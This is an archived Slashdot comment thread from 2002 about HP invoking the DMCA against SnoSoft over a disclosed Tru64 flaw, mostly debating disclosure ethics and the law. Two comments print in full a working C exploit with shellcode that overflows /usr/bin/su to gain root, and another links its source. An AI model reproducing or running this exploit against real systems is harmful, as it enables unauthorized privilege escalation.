Slashdot is powered by your submissions, so send in your scoop

 



Forgot your password?
typodupeerror
×
Censorship

HP Uses DMCA To Quash Vulnerability Publication 675

Several readers wrote to note the fact that HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft who have found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."
This discussion has been archived. No new comments can be posted.

HP Uses DMCA To Quash Vulnerability Publication

Comments Filter:
  • Bruce Perens (Score:5, Insightful)

    by BoyPlankton ( 93817 ) on Tuesday July 30, 2002 @08:33PM (#3982899) Homepage
    So this is the real reason HP didn't want Bruce Perens to demonstrate against the DMCA?
    • Re:Bruce Perens (Score:5, Informative)

      by Bruce Perens ( 3872 ) <bruce@perens.com> on Tuesday July 30, 2002 @10:33PM (#3983563) Homepage Journal
      I don't know, but I am not happy to hear this at all. And if it's true, I'll take them to task for it. This is the first I've heard of the whole thing.

      Bruce

      • Re:Bruce Perens (Score:5, Informative)

        by Bruce Perens ( 3872 ) <bruce@perens.com> on Tuesday July 30, 2002 @10:52PM (#3983655) Homepage Journal
        By the way, my phone is 510-526-1165, if you feel the need to talk about this. I leave that line off the hook when I don't want calls, but it's available most of the day.

        Bruce

        • by Anonymous Coward on Wednesday July 31, 2002 @12:21AM (#3983966)
          I dont see the point of taking HP to task for it.
          It's a waste of time. Even if they back off .. whoopdee doo.

          Please .. what we need is a change in the law.

          Hackers can expose findings and report them to companies .. too often a flaw gets found and the company sweeps it under the rug maybe they'll fix it in the next version but prior versions are vulnerable.

          Given the sad fact that all our politicians (not just in america but worldwide are elected by money) maybe the following compromise can be reached:

          a) Hackers who find vulnerabilites must email a notice and description to the company. He must try to give at least 24 hours notice before announcing it to the public unless he knows of an imminent exploit in the wild (like an impending mass DDOS attack or something). In that case he should be allowed to announce it to the public immediately.

          b) Companies that take no action (that is dont make a patch available/requestable) on a vulnerability that was reported to them but not announced to the public, are liable for exploits.

          c) The setup of a third party security company or government department where hackers can email reports of finding vulnerabilities. This is like CERT or bugtraq but the organization must have the funding and capability to pursue inaction on the part of companies that do not fix reported and well documented security flaws.

          Is there any way for you to use your publicity to bring something like this about?

          At least try. I hate the fact that curiousity is now a crime. I am allowed to take apart my car and see how it works .. why cant I do it with the applications I use and store my depply personal information (from baby pictures to tax and health records) on?

          Thanks,

          Johan
        • by Anonymous Coward
          Posting your phone number on /. - damn, I guess you do need that wheelbarrow !
      • by Futurepower(R) ( 558542 ) on Tuesday July 30, 2002 @11:22PM (#3983763) Homepage

        Bruce, if I were president of HP, I would immediately fire Kent Ferson, the vice president who wrote the letter. The letter says, basically, that HP is not able to fix the problem, and would rather hide its security problems.

        This is a marketing disaster for HP. Probably Mr. Ferson has little technical knowledge and does not realize that his letter speaks loudly and clearly to the whole world of technically knowledgeable people, and does irrepairable damage to HP.

        We live in an amazing world where free products are better than expensive ones. The open source response to a security problem is to have a bug fix on all the mirrors in 48 hours. The response of billion dollar companies with tens of thousands of well-paid employees is to try to weasel out of doing the right thing. Who would have guessed it would be that way?

        It seems that you could do HP a big favor if you could educate top management. But maybe they are not educable.
        • by Bruce Perens ( 3872 ) <bruce@perens.com> on Wednesday July 31, 2002 @12:13AM (#3983939) Homepage Journal
          Let's not get draconian yet, it could be correcting a wrong with another wrong. Maybe an apology is what is necessary, and perhaps that would teach a better lesson to all involved. But I can't say what is necessary until I see full data. All I have tonight are news reports.

          Bruce

          • Let's not get draconian yes,

            I'm going to wander slightly off topic here but I feel what you are saying is wrong. Today, top company exectutives seem to be above the law. They can operate their companies however they choose. No one ever seems to hold them accountable. A company goes bankrupt, thousands loose their jobs and top executives are laughing all the way to the bank. In this example an executive acts in an irresponsible manner that could affect many of his customers, and you suggest mearly a wrist slap?

      • Re:Bruce Perens (Score:4, Interesting)

        by Bruce Perens ( 3872 ) <bruce@perens.com> on Wednesday July 31, 2002 @12:06AM (#3983906) Homepage Journal
        I just woke up my boss and am in email correspondence with various other people. Obviously, a lot of the people involved are going to be unavailable until tomorrow morning.

        My terms of employment with HP allow me to publicly criticise the company when necessary. I'd rather help them fix the problem so that the criticism is all in the past tense, but the criticism will come if necessary. All I have to go on tonight is news reports.

        Thanks

        Bruce

      • by Bruce Perens ( 3872 ) <bruce@perens.com> on Wednesday July 31, 2002 @01:07AM (#3984116) Homepage Journal
        Folks,

        In my investigation, I read the Snosoft home page [snosoft.com]. This is the second sentence of their introductory paragraph:

        Our advisory release policy is full disclosure unless bound by contract.

        Now, I don't know any of the people involved or how they really do business, and thus I am not ready to make any allegations. But that sentence sounds a bit like a shakedown, doesn't it?

        I would hate to be manipulated in a shakedown of my own company.

        On the other hand, some people say this is a year-old bug and that there was long correspondence before one of the employees finally revealed it. I don't know if that's true yet.

        What do you think?

        Bruce

        • by friedmud ( 512466 ) on Wednesday July 31, 2002 @01:27AM (#3984181)
          Bruce,

          I guess I don't understand how full disclosure can equate to a shakedown.

          The company (snosoft) seems like a more or less legit research company, and the fact that they have a full disclosure policy in no way says that they are trying to take out companies. It just says, up front, that they have a policy of disclosing these security breaches that they find.

          On the other hand they have to make money somehow - so they contract out their services to companies who wish to have their software audited.

          I could be wrong, but by looking through their posts on security focus, I don't think they are out to extort money from companies - and this is especially true if they gave HP a year to fix this problem (in fact if that is true then you should REALLY stick it to the top brass).

          It could go either way - but it doesn't look like they are in the business of extortion. And the fact that they have been around for a while, and seem to be respected in the security community says quite a lot....

          ON THE OTHER HAND.... I don't see how it is in any way shape or form right for HP to sick the DMCA on them, no matter what their business practices are. This is a vulnerability in HPQ's software and should not be treated with such arrogance (don't report it or else!).

          Just my $.02

          Derek
        • It looks like that text has been removed - at least, I don't notice it at that URL (or during a cursory search through the site). Having said that - this does put forward an interesting question.

          How are contracted researchers expected to behave in such a situation?

          It seems that the usual "full disclosure" notice comes from an audit of a product by an external group / individual without contract or invitation by the producer of that product (publicity-grabbing "hacker challenges" aside). Such reports certainly warn the product's user base. But they also seem to be an attempt to embarass the producer of that product to action - patching the current issue and perhapse increasing future quality control.

          What if the research group is hired by WidgetSoft to audit the Widget2000 and they discover a major vulnerability? It is unlikely the public will ever hear of it from the research group. WidgetSoft will likely develop the patch, and release it with their own report based on the research group's findings.

          But what if WidgetSoft decides to bury the findings? Then our hypothetical research group has a dilema. It would be wise for this group to be sure their business contract specifically avoids conflicting with their morals.

          Unless, of course, they're in the business of the shake-down.
        • Bruce,
          Even if it was a company that engaged in outright extortion, ie "we just found this hole, pay us $10,000 by Friday or we release it", some advice my Mother gave me comes to mind.

          Two Wrongs Don't Make a Right

          HP's Customer's are inocent third parties in this matter. Once the exploit was released, no matter how shady the people who released it were, HP should have been trying to notify it's customers instead of engaging in a futile attempt to put the cat back in the bag. HP has increased the harm to innocent third parties by not contacting them, and now their actions have insured that the code for the exploit is more widely distrubited than before.

          SnoSoft's actions may have been wrong, but that did not give HP a license to engage in wrong actions of their own.

      • Re:Bruce Perens (Score:4, Interesting)

        by 0xA ( 71424 ) on Wednesday July 31, 2002 @03:18AM (#3984528)
        Bruce,

        I plan to call you tomorrow and follow this up with an email but I imagine both your inbox and telephone line are going to be jammed tomorrow so I will post as well. These are my comments on the situation and my reaction as a customer.

        I have been working with Compaq and HP systems my entire career, Intel based servers, UNIX servers and workstations, printer and software. Working as a retail reseller, VAR and customer I have recommended the purchase of HP and Compaq systems many times in the past and am now in a position to have final authority on what systems are purchased for my company. Our entire infrastructure is based on HP and Compaq products.

        As a customer I must trust my vendors to act quickly and responsibly to give me the tools and information I need to keep my systems secure. Timely, complete vulnerability information and patches are critical to my success here. There is no framework, process or authority that provides for the responsible publication of this information, given the nature of many of the parties involved I doubt there can ever be a comprehensive solution. When a third party (outside of vendor and customer) finds a problem with a piece of software and decides to act irresponsibly the situation gets complicated, the Apache Foundation's problems last month are an example of this. From the news reports on news.com today I believe HP currently finds itself in a similar situation. The information I have been able to find does not paint SnoSoft or their member "Phased" in a good light, I suspect that the group has acted in bad faith or at least "Phased" has acted irresponsibly in the matter. I do not pass judgment on HP's actions in producing a solution for this problem.

        However the comments of Kent Ferson as reported on news.com concern me greatly. By threatening the use of the DMCA or any other criminal statute in this matter, Mr. Ferson has turned the security community on it's head. HP's position as a market leader could go a long way to setting this as a precedent in the industry and law, the results of which could be devastating. While I recognize the importance of a group like SnoSoft working with a vendor to coordinate their disclosure with a vendor's fix, this also has to happen in an efficient manner. The chances are good that SnoSoft has discovered a problem that others know about or are explioting can not be ignored. The potential harm that can come from using criminal charges to frustrate or slow this process is hard to express. The responsibility for ensuring my company's systems are secure is mine, I must have the information I need to make responsible decisions on security. If this means removing systems from service until I can secure them then that is what I will do.

        Regardless of the events leading to Mr. Ferson's letter to SnoSoft HP must clarify their position on this situation. I would hope that you are willing to state that provided no illegal methods were used to discover the vulnerability HP will not pursue criminal prosecution of researchers. If SnoSoft or Phased has acted in bad faith or breech of contract it is a matter for civil courts.

        Aaron Schneider
        Manager, Information Technology
        Fabutan Sun Tan Studios
        Schneider@fabutan.com
  • Ironic (Score:5, Insightful)

    by chill ( 34294 ) on Tuesday July 30, 2002 @08:33PM (#3982905) Journal
    No WONDER they wanted Mr. Perens to not demonstrate at that conference. Can you IMAGINE the dueling press releases -- on one hand, defeating DRM and on the other using the club of the DMCA.

    The chickenshit weasels.
  • by Anonymous Coward
    This case, if the facts hold up, is potentially among the strongest that could be made before the courts. It's not just "evil hacker" that wants to steal stuff, it's a legitimate security problem that a company is trying to keep quiet.

    The Supreme Court tends to frown heavily on prior restraint.
  • Apache (Score:5, Insightful)

    by vex24 ( 126288 ) on Tuesday July 30, 2002 @08:34PM (#3982913) Homepage
    Funny how when Apache had a hole released before they had a chance to fix it, they gave off a muted air of annoyance and fur that had been rubbed the wrong way.

    Very mature compared to what big business does. "Wahh wahhh wahh!!! Help us Uncle Sam, we're poor defenseless transnational corporations!" Buncha whiners.

    • Re:Apache (Score:5, Insightful)

      by gmack ( 197796 ) <gmack@noSpAM.innerfire.net> on Tuesday July 30, 2002 @09:11PM (#3983139) Homepage Journal
      Look at the diffrence though .. Xforce didn't wait before releasing a patch that failed to fix the problem along with an advisory that didn't grasp the full scope of the bug they found.

      These guys waited a YEAR and HP still hadn't fixed the problem.
  • by rodgerd ( 402 ) on Tuesday July 30, 2002 @08:35PM (#3982919) Homepage
    When Alan Cox originally discussed the notion that companies would (mis)use the DMCA in the security field, he was widely attacked for being silly.

    Anyone still feel like laughing?
    • by Rohan427 ( 521859 ) on Tuesday July 30, 2002 @10:08PM (#3983452)
      I actually submitted to LKML - on 8/1/2001 - that the DMCA could be used in this manner, and I also submitted several posts regarding other warnings about other laws. I hate to say I told you/them so, but I did:

      [SNIP of e-mail quote I replied to]
      "It's very simple, and something like this is done all the time in the security industry
      by people who not only enjoy it, but who get paid to do it.

      1) Discover an exploit or a new way of using a known exploit.
      2) Write a trojan, virus, worm, etc. that takes advantage of the exploit.
      3)* Report the exploit to the applicable compan(y/ies), Security Focus, etc. and provide
      the BINARY of your trojan, virus, or whatever so they can test the
      exploit and find a fix.

      * Usually people provide the source code as open software. In this case (for this
      argument) we release it as binary only and keep full rights.

      No law was broken when the trojan, virus, etc. was written and no one can (technically)
      seek prosecution. Under DMCA (at least the way the writers of it have
      used it), anyone attempting to reverse engineer your virus (or whatever) and provide an
      antigen, is liable to you and you can sue them.

      To take another angle, those of us who actively look for exploits in software (because
      companies like M$ fail to do so themselves) risk being sued for doing so.
      This makes jobs like mine EXTREMELY difficult because on the one hand I don't want my
      company using software that will allow Joe Cracker to take over our
      machines, and on the other I don't want the company sued just because I did some
      necessary reverse engineering in order to prevent it (again, because the
      software mfg. can't be trusted to do it themselves).

      PGA

      --
      Paul G. Allen
      UNIX Admin II/Programmer
      Akamai Technologies, Inc.
      www.akamai.com
      Work: xxx-xxx-xxxx
      Cell: xxx-xxx-xxxx"

      (Note: I no longer work for the above referenced company as my office was closed late last year. My statements and views are mine alone and do not, nor ever have, represented the views of Akamai Technologies, Inc. or any of it's officers and/or representatives.)

      So, what do _I_ get for my warnings to the kernel developers? Blackballed from the list by the maintainer, in a rather rude fashion IMO. (despite the fact that I've received many a thank you for the information I had provided)

      So, to all those who have read, heard, and seen such warnings, wherever you've read, seen, or heard them, and were asked to take action and do not, I say stop whining, shut up, and suffer. The same thing I tell people who don't vote - if you can't do your part to fight the problem, you have no right to bitch and moan about it.

      My solution to many of these issues is not to support the companies promoting them. I no longer buy CDs, DVDs, or go to movies (yes, I will be missing the second in the LotR series - which I have long awaited.) I do not buy Compaq, and will never buy another HP device. I do not buy M$ products or anoything that runs on M$ platforms either. I have written letters to congress critters, etc. as well.

      How many others can say they've actually done their part to fight the DMCA, US Patriot Act, CDBTPA, etc. and/or whatever equivalent laws you may have in your own countries?

      I for one wish more folks in Alan's position would speak up. I commend him for doing his part, and he's not even a US citizen, is he?

      I for one never did laugh at him.

      PGA
      • > I no longer buy CDs,

        Thats a shame. There is a lot of great music on independant labels who have a really good attitude to their fans. They don't hide lyric sheets, they often waive some radio fees and in many cases they work through local recording studios and cd firms helping them to survive and support local music.

        I don't know about the USA but the UK has many relatively independant and completely independant small labels (eg www.showofhands.co.uk - a band whose musicians who actually go around teaching people to play their music, www.madrarua.com (ok Im biased they are in Swansea)). When I visited St Johns newfoundland I was amazed at the huge mostly independant and deeply vibrant music culture there.

  • FUCK HP (Score:2, Insightful)

    by Anonymous Coward
    Here's another fucking BIG CORP trying to strongarm to get there way.

    Fuck HP. IT's like Ford trying to get the safety concerns of the Pinto hushed up.

    Consumers are in danger, and WE COME FIRST.
  • by shoemakc ( 448730 ) on Tuesday July 30, 2002 @08:36PM (#3982923) Homepage

    Halfway around the world, Bill Gates breathes a long sigh of relief as Microsoft's profitability is assured well into the next century...

    -Chris

  • If suits like this go to trial, and don't result in huge gains for the plaintiff, the caselaw will tend to discourage others. In some ways that would be better than a repeal.

  • An Excellent Quote (Score:5, Insightful)

    by unsinged int ( 561600 ) on Tuesday July 30, 2002 @08:37PM (#3982927)
    Finisterre said that while he wanted to resolve the dispute with HP, he resented receiving DMCA threats. "We are like the guys that found out that Firestone tires have issues on Ford explorers," he said. "It's not our fault your Explorer has crap tires. We just pointed it out. We should not get attacked for pointing out issues in someone's product nor for proving it is possible."

    When will people learn this is the same thing?
    • by rodgerd ( 402 )
      Why, when the media conglomerates who lobbied for this bill use the newspapers (they own), TV new and documentaries (they own) and radio shows (they own) to explain to people why the DMCA is such a bad idea, and what the negative ramifications of it are.

      I'm sure the congressmen (they own) will also take a responsible line, and won't conflate these kinds of issues with actual breaches of copyright, terrorism, or other acts most people consider unacceptable.
  • by SunCrushr ( 153472 )
    Finding and publishing a security hole in an OS is not a way to circumvent copyright protection.
    If I take over somebody's True64 machine via this security hole, I haven't broken copyright at all.
    Now, if I take documents off of the server, then I may be breaking copyright, but I don't think the connection is strong enough to stand up in a court of law.
    I could hold up a book store with a gun and make them give me their books. I've stolen the books and therefore broken copyright. Does that mean we should ban guns since they are a possible copyright protection circumvention device?
  • by JoeBuck ( 7947 ) on Tuesday July 30, 2002 @08:40PM (#3982943) Homepage

    It was legitimate for you to cooperate with HP's valid concern that, as a "deep pockets" organization it would be too risky for them to let you challenge the DMCA. I understood that.

    But now it appears that you work for a company that is using the DMCA as a club to suppress discussion of security flaws. It doesn't seem that the two hats you wear (your HP role and your open source leadership role) are compatible unless you can persuade HP to back off.

    It is possible, of course, that the DMCA threat is coming from one manager who is shooting his mouth off. If so, we need a clarification from higher management: is it the policy of HP to use the DMCA to suppress discussion of their security flaws, or not?

    • I suspect Bruce won't be able to reply here for legal reasons (though he maybe able, we'll see) but he's definitely reading, I think we can all guess that. HPaq is going to be increasingly difficult to work with in the future, by any guess I think I can make. They're bigger, they're badder, more bloated, and they're aiming at a much more demanding and volatile market so any "advantage" they can use to squash appearance of failure or flaw is going to be rapidly pounced upon before they suffer the fate of any large star that runs out of power. The DMCA is just today's big stick. Will they bring out a bigger one later?

      Does this cause Bruce to reconsider his employer? Only Bruce knows. Does this cause us to want him to make a statement by resigning or taking some other action? I suspect so. But I don't want to see the community pushing him toward a decision that isn't in his best interests. I think we just need to sit back and wait, to see what happens next.
      • One has to balance law and personal integrity. If things went down the way they were reported - and that's a big if - I would not really be able to stand by this, and would probably air some criticism of HP management. When I was hired, I did negotiate how and when I could criticize the company, and this falls within those parameters. Would I quit? Some people think I should stay around and try to teach them the right thing to do. Not that this would be easier than quitting. But HP isn't going away just because I slam the door on them.

        Bruce

    • I just heard of this for the first time, so give me some time to speak with the people involved.

      Bruce

  • Simply linking to the source code, like they are could get them into trouble, could it not?

    http://deepmagic.securify.org.uk:8080/su.c
    • by User 956 ( 568564 ) on Tuesday July 30, 2002 @09:15PM (#3983157) Homepage
      #include stdio.h
      #include stdlib.h
      #include string.h
      #include unistd.h

      char shellcode[]= "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47" "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "xff\xff\xff\xff" "x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";

      main(int argc, char *argv[]) {
      int i, j; char buffer[8239]; char payload[15200];
      char nop[] = "\x1f\x04\xff\x47"; bzero(&buffer, 8239); bzero(&payload, 15200); for (i=0;i8233;i++) buffer[i] = 0x41;

      buffer[i++] = 0x01; buffer[i++] = 0x04;
      buffer[i++] = 0x01; buffer[i++] = 0x40;
      buffer[i++] = 0x01;

      for (i=0;i15000;) { for(j=0;j4;j++) { payload[i++] = nop[j]; } }
      for (i=i,j=0;jsizeof(shellcode);i++,j++)payload[i] = shellcode[j];
      printf("/bin/su by phased\n");
      printf("payload %db\n", strlen(payload));
      printf("buffer %db\n", strlen(buffer));
      execl("/usr/bin/su", "su", buffer, payload, 0);
      }

      • I think the truly impressive part of this code is getting past the lameness filter... that's gotta be against some law
      • by User 956 ( 568564 ) on Wednesday July 31, 2002 @01:54AM (#3984264) Homepage
        #include <stdio.h>
        #include <stdlib.h>
        #include <string.h>
        #include <unistd.h>

        char shellcode[]=
        "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47"
        "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";

        main(int argc, char *argv[]) {
        int i, j;
        char buffer[8239];
        char payload[15200];
        char nop[] = "\x1f\x04\xff\x47";

        bzero(&buffer, 8239);
        bzero(&payload, 15200);

        for (i=0;i<8233;i++)
        buffer[i] = 0x41;

        /* 0x140010401 */

        buffer[i++] = 0x01;
        buffer[i++] = 0x04;
        buffer[i++] = 0x01;
        buffer[i++] = 0x40;
        buffer[i++] = 0x01;

        for (i=0;i<15000;) {
        for(j=0;j<4;j++) {
        payload[i++] = nop[j];
        }
        }

        for (i=i,j=0;j<sizeof(shellcode);i++,j++)
        payload[i] = shellcode[j];

        printf("/bin/su by phased\n");
        printf("payload %db\n", strlen(payload));
        printf("buffer %db\n", strlen(buffer));

        execl("/usr/bin/su", "su", buffer, payload, 0);

        }

  • by ocie ( 6659 ) on Tuesday July 30, 2002 @08:41PM (#3982947) Homepage
    "HP hereby requests that you cooperate with us to remove the buffer overflow exploit from Securityfocus.com"

    HP users herby request that HP remove the buffer overflow exploit from Tru64.
    • by weave ( 48069 )
      "HP hereby requests that you cooperate with us to remove the buffer overflow exploit from Securityfocus.com"

      How long before Security Focus's new owner, Symantec, starts to take threats like this and force Security Focus to comply with demands like this?

      I just checked, at least the post in question is still in their mailing list archives...

  • DMCA and research (Score:4, Insightful)

    by Col. Klink (retired) ( 11632 ) on Tuesday July 30, 2002 @08:41PM (#3982953)
    HP's dramatic warning appears to be the first time the DMCA has been invoked to stifle research related to computer security.
    Um... wasn't that hole Felton/SDMI thing the first time the DMCA was invoked* to stifle research related to computer security?

    * Technically, they only threatened to invoke the DMCA. As of now, HP has also only threatened to invoke it.

  • by zaren ( 204877 ) <fishrocket@gmail.com> on Tuesday July 30, 2002 @08:41PM (#3982955) Journal
    "On July 19, a researcher at SnoSoft posted a note to SecurityFocus.com's popular Bugtraq mailing list with a hyperlink to a computer program letting a Tru64 user gain full administrator privileges. The researcher, who goes by the alias "Phased," said in the message: "Here is the warez, nothing special, but it does the job." "

    Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way. If this was announced in a different way, like say a formal research group contacting the company privately with test results, instead of just some random person posting under an alias to an open list like BugTraq, things might be different.
    • I suppose you'd like an assasins' guild too, so that amateurs and people outside your sphere of influence don't commit murders? It doesn't work that way. Sorry.
    • by m0rph3us0 ( 549631 ) on Tuesday July 30, 2002 @08:49PM (#3982999)
      The article says the informed HP about these vuln's a year earlier, in reality it is up to the company to secure their products, mistakes happen, but should Ralph Nader be put in jail for telling people that the Pinto's gas tank would explode on impact?
    • by dnoyeb ( 547705 ) on Tuesday July 30, 2002 @09:08PM (#3983120) Homepage Journal
      Yes, HP could possible assume the exploit is not totally public. As it stands, some random Joe posting an exploit says the exploit is mainstream by now...
    • by Karma Farmer ( 595141 ) on Tuesday July 30, 2002 @10:12PM (#3983479)
      Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way.

      No, of course you wouldn't like it. And, if you were an emperor who got suckered into walking around naked, you'd be fairly pissed at the kid who pointed out that you were, in fact, naked.

      But, this story has nothing to do with HP "liking" or "not liking" it when people (rightly) point out that they're walking around naked. The story is about the fact that the DMCA has emboldened HP to the point that they feel it's better to walk around naked and sue anyone who notices, rather than buying some reasonable clothes.

      Etiquette in the security community demands that the discovers of holes give companies reasonable time to respond to security problems, before publicizing the security problems. But this courtesy is not, in any way, a courtesy towards the company that manufactures the flawed product. That company's opinion in the matter doesn't mean squat. It is a courtesy extended entirely to the users of the product. Users are harmed if they do not know about exploitable flaws in the products they use, but at the same time users are harmed if the exploitable flaws are widely known before patches are available. The only reasonable role for a company with flawed products in the security process is to work diligently to minimize the harm to users, by the only method available to them -- by expediting patches for their products, and thus providing an environment where the user can be informed of security flaws in their product as quickly as possible.

      Unfortunately, what HP has done here is imagine itself to have some other role in the security process -- someone at HP is under the completely mistaken impression that their opinion of the security process matters in any way. It does not. The courtesies of the security process are entirely towards the users of the flawed product. People have a right to know about flawed products. HP has the opportunity to provide patches to their product, so that those users might have some alternative to simply throwing all of their HP equipment in the garbage, but that is entirely HP's opportunity, and really of no concern either to the users or to the security professionals who disclose the hole.
  • by ecalkin ( 468811 ) on Tuesday July 30, 2002 @08:42PM (#3982958)
    this is really a shame. hp was one of the technology companies that had a lot going for it.

    when you are fighting in a tough market *and* trying to make a merger happen without too much bad stuff, it seems that it is counter-productive to play this game: you make people mad, you spend resources (money and man-hours that could be easily used elsewhere) and you are *not* going to achive the immediate goal of supressing bad stuff (real or imagined).

    so hp gets more points in the bad pr column, they waste money, and the problem doesn't go away. i hope that they spin off the printer division before they crash and burn.

    eric

    p.s. i guess the worst part is that hp *didn't* learn from all the other companies that went down this path.
  • bugtraq email (Score:4, Informative)

    by Anonymous Coward on Tuesday July 30, 2002 @08:44PM (#3982966)
    Contents of the bugtraq email. Doing anon, fearful of prison buggery:


    got fed up of corporate bullshit
    here is the warez, nothing special, but it does the job :)
    note, this is just one of many many exploitable bofs in tru64 5.x
    http://deepmagic.securify.org.uk:8080/su.c
    phased
    phased@mail

  • Very Frustrating (Score:2, Insightful)

    by Anonymous Coward
    How are we to feel secure while computing if it is illegal to check up on the companies providing the software/hardware solutions?

    Imagine if you would, a secure piece of software ( or a secure piece of hardware ) is sold to handle monitary transactions, no-one can verify that the software/hardware is infact secure ... except the criminals who are going to exploit the vulerability and steal hard earned money.

    Yeah for the DMCA for protecting corporations instead of the individual!

    my 2 cents.
  • I will never buy another one of your products, and I am seriously considering returning the ones that I have. I am in the position that has a great deal of spending power and 95% of the say as to what my company purchases, and I will never purchase an HP or Compaq product again. Thank you very much.

    Sincerely,

    A Former Customer.
    • A big customer could claim this damages their ability to operate and sue HP for suppressing information, the absense of which could lead to increased vulnerabilities in their systems.

      It's too bad that people have egos, also, because if things like hard crypto implementations, security information, and so on were simply released anonymously into various outlets (e.g., not just the net), there would be nobody to sue.

      In this case I think there won't be anybody to sue either -- the individual who made the report might not be subject to US law.

      Take this to its logical conclusion, and realize that computer systems in the USA will tend to be less secure than their counterparts in free countries that do not suppress information exchange. I wish it were simpler to relocate to Europe; it sure as hell appears to be easy for them to relocate to the USA.

  • by m0rph3us0 ( 549631 ) on Tuesday July 30, 2002 @08:47PM (#3982985)
    in other news today the FBI raids the offices of SnoSoft in search of DMCA prohibited cracking tools, they immediately sieze compilers, source code, and felt markers.
  • by KFury ( 19522 ) on Tuesday July 30, 2002 @08:50PM (#3983005) Homepage
    So does this a sign that Microsoft will once again(?) be a secure platform, because now in addition to:
    • Securith through Obscurity
    and
    • Security through Diligence
    we now add the mighty
    • Security through Litigation?
    To be fair, when do the handgun designers go to jail again?
  • DMCA Violation? (Score:3, Insightful)

    by _LFTL_ ( 409654 ) on Tuesday July 30, 2002 @08:50PM (#3983006)
    Ok someone fill me in here:

    How on earth does a law pertaining to the circumvention of copyright protection systems apply at all to someone releasing a security flaw in an operating system?
    • Re:DMCA Violation? (Score:4, Insightful)

      by fishbowl ( 7759 ) on Tuesday July 30, 2002 @08:55PM (#3983037)
      It does not. And if everyone involved has the guts to go ahead and let a jury decide, we might ALL be better off. Until someone does this, it's an open question whereby the mere threat of anything and everything is enough to control the behavior of individuals.

      • Re:DMCA Violation? (Score:4, Interesting)

        by buss_error ( 142273 ) on Tuesday July 30, 2002 @09:16PM (#3983162) Homepage Journal
        And if everyone involved has the guts to go ahead and let a jury decide, we might ALL be better off.

        It is one thing for a MegaCorp to slam down a few million on litigation, it's another for me to pay to fight it. Am I really willing to go to the poor house over this issue? Am I really willing to throw away a fair job, an OK home, and my car?

        The problem in the US is that justice is bought and paid for. If you don't have the cash, you are part of the trash. Trash gets swept up. No, the only real effective course of action is to start bitching to office seekers and to stop paying for Intellectual Property. Swap CD's, swap DVD's, for God's sake read a book from the library. But don't shell out bucks for IP anymore. The profit they make is part of the club they are using against us.

        If no one purchased what Sony is selling, how long do you think Sony would stay in business? If we boycott RIAA members, how long would it be until Ms. Rosen had to go earn an honest living?

        Look, it's not a problem if you fall off the wagon. Just take the amount of money you spent on that CD, movie or DVD and send a like amount to the EFF.

        OK, so I'm a broken record.

  • Re: (Score:2, Interesting)

    Comment removed based on user account deletion
  • Ridiculous (Score:5, Insightful)

    by dh003i ( 203189 ) <dh003i@gmail. c o m> on Tuesday July 30, 2002 @08:54PM (#3983033) Homepage Journal
    The public has the right to know about these security flaws, just as much as we have the right to know if the tires we buy pass safety standards.

    HP trying to cover this up just proves its a problem. HP is using the DMCA to prevent people from discussing valid flaws in their OS'.

    People have the right to know if the car they're driving -- or are going to buy -- is unsafe. Why? Because their lives depend on it, literally. For the same reason, people have the right to know if the OS they're using is secure. Why? Because their lives depend on it, or at least their carreers. Data important to one's carreer (i.e., scientific experimental data) is stored on one's computer. Private information -- i.e., credit card information -- is stored on a computer. Security holes can literally destroy one's life.

    We have the right to know exactly what problems their are in our software.
  • The DMCA just made this world a safer place.

    Don't ask, don't tell.
  • as a Tru64 admin... (Score:4, Interesting)

    by Corgha ( 60478 ) on Tuesday July 30, 2002 @08:59PM (#3983059)
    This is just another reason to say "fuck you, the new HP" and run faster to Linux and *BSD. Admittedly, anyone who has recently had to compare the price of an ES40 and an equivalent amount of Intel-compatible compute is probably already heading there...

    Still, this sort of head-in-the-sand response to security vulnerabilities is not a good way to make happy customers. Obviously, the exploit exists; what HP apparently wants to do is make sure that it only gets passed around on IRC so that admins can get completely blindsided.

    Of course, Compaq already killed the Alpha, and don't get me started on their support contracts (OK, so they inherited those). It's almost as if they don't want customers (well, DigitalUNIX/Tru64 customers probably *are* a bit of a pain in the ass, compared to MCSEs).

    It's just sad to see the last bits of the carcass of what was once a pretty cool company (DEC) get so abused.
  • by Arcturax ( 454188 ) on Tuesday July 30, 2002 @09:02PM (#3983085)
    Email their president and CEO from this page! [hp.com]

    Tell her in NICE non flaming tones why you feel what they are doing is wrong. Explain that this kind of action makes you unwilling to buy any more products from them.
    • by Anonymous Coward on Tuesday July 30, 2002 @09:31PM (#3983245)
      Dear Ms. Fiorina,

